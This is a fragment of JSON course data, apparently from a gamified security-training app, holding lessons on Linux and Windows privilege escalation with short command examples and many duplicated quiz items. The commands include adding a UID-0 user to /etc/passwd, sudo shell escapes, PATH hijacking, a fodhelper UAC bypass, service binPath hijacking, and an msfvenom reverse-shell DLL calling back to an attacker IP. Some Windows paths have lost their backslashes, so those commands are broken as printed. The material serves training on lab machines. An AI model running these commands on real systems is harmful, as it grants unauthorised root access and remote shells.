frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"writable-etc-passwd","cat":"Privilege Escalation","title":"Writable /etc/passwd","diff":1,"xp":50,"intro":"If /etc/passwd is writable, add a root user in one line.","sections":[{"type":"text","content":"On misconfigured systems, /etc/passwd might be writable. Add a new user with UID 0."},{"type":"code","lang":"bash","content":"openssl passwd -1 -salt xyz password123\necho 'hacker:$1$xyz$hash:0:0::/root:/bin/bash' >> /etc/passwd"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What UID makes a user root?","opts":["1000","100","0","65534"],"ans":2},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"sudo-misconfig","cat":"Privilege Escalation","title":"Sudo Misconfigurations","diff":1,"xp":75,"intro":"sudo -l is the first command after getting a shell. Always.","sections":[{"type":"text","content":"Many sudo-allowed commands can spawn a shell. Even sudo vim gives you root."},{"type":"code","lang":"bash","content":"sudo -l\nsudo vim -c ':!sh'\nsudo find / -exec /bin/sh ; -quit\nsudo python3 -c 'import os; os.system(\"/bin/bash\")'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"First command for Linux privesc?","opts":["whoami","uname -a","sudo -l","id"],"ans":2},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"path-hijacking","cat":"Privilege Escalation","title":"PATH Variable Hijacking","diff":1,"xp":75,"intro":"A root script calls 'service' without a full path. You control what 'service' means.","sections":[{"type":"text","content":"If a privileged script calls a command without its full path, you can create a malicious version and prepend your directory to PATH."},{"type":"code","lang":"bash","content":"echo '#!/bin/bash' > /tmp/ps\necho '/bin/bash -p' >> /tmp/ps\nchmod +x /tmp/ps\nexport PATH=/tmp:$PATH"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"PATH hijacking exploits what?","opts":["Kernel bugs","Commands without full paths","Buffer overflows","Race conditions"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-token-impersonation","cat":"Privilege Escalation","title":"Windows Token Impersonation","diff":2,"xp":150,"intro":"SeImpersonatePrivilege on a service account = instant SYSTEM.","sections":[{"type":"text","content":"Windows service accounts often have SeImpersonatePrivilege. Tools like PrintSpoofer and GodPotato exploit this."},{"type":"code","lang":"powershell","content":"whoami /priv\n# PrintSpoofer\n.PrintSpoofer.exe -i -c cmd"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Which privilege enables token impersonation?","opts":["SeDebugPrivilege","SeImpersonatePrivilege","SeBackupPrivilege","SeShutdownPrivilege"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"uac-bypass","cat":"Privilege Escalation","title":"Windows UAC Bypass","diff":2,"xp":150,"intro":"UAC prompts can be bypassed through auto-elevating binaries.","sections":[{"type":"text","content":"Auto-elevating binaries like fodhelper.exe can be abused to run commands as admin without a UAC prompt."},{"type":"code","lang":"powershell","content":"New-Item -Path 'HKCU:SoftwareClassesms-settingsshellopencommand' -Force\nNew-ItemProperty -Path 'HKCU:SoftwareClassesms-settingsshellopencommand' -Name '(default)' -Value 'cmd.exe' -Force\nStart-Process fodhelper.exe"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What is UAC?","opts":["A firewall","User Account Control for admin actions","An antivirus","A network filter"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-service-misconfig","cat":"Privilege Escalation","title":"Windows Service Misconfiguration","diff":2,"xp":150,"intro":"Weak service permissions let you replace binaries.","sections":[{"type":"text","content":"If a Windows service has weak DACL permissions, you can modify its binary path and restart it for SYSTEM execution."},{"type":"code","lang":"cmd","content":"accesschk.exe /accepteula -uwcqv \"Authenticated Users\" *\nsc config vuln_svc binPath= \"C:UsersPublicshell.exe\"\nsc stop vuln_svc && sc start vuln_svc"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What context do most Windows services run under?","opts":["Administrator","Guest","SYSTEM","Network Service"],"ans":2},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"dll-hijacking","cat":"Privilege Escalation","title":"DLL Hijacking","diff":2,"xp":200,"intro":"A privileged app loads a DLL from a writable location.","sections":[{"type":"text","content":"Windows DLL search order means apps check writable directories before system directories."},{"type":"code","lang":"bash","content":"# Use ProcMon to find DLL load attempts with NAME NOT FOUND\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o hijacked.dll"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Best tool for finding DLL hijacking?","opts":["Wireshark","Process Monitor","Task Manager","regedit"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"unquoted-service-path","cat":"Privilege Escalation","title":"Unquoted Service Paths","diff":1,"xp":75,"intro":"Spaces + no quotes = Windows misinterprets the executable path.","sections":[{"type":"text","content":"Unquoted service paths with spaces let Windows try multiple executables."},{"type":"code","lang":"cmd","content":"wmic service get name,pathname,startmode | findstr /i \"Auto\" | findstr /i /v \"C:Windows\" | findstr /i /v \"\\\"\""},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS 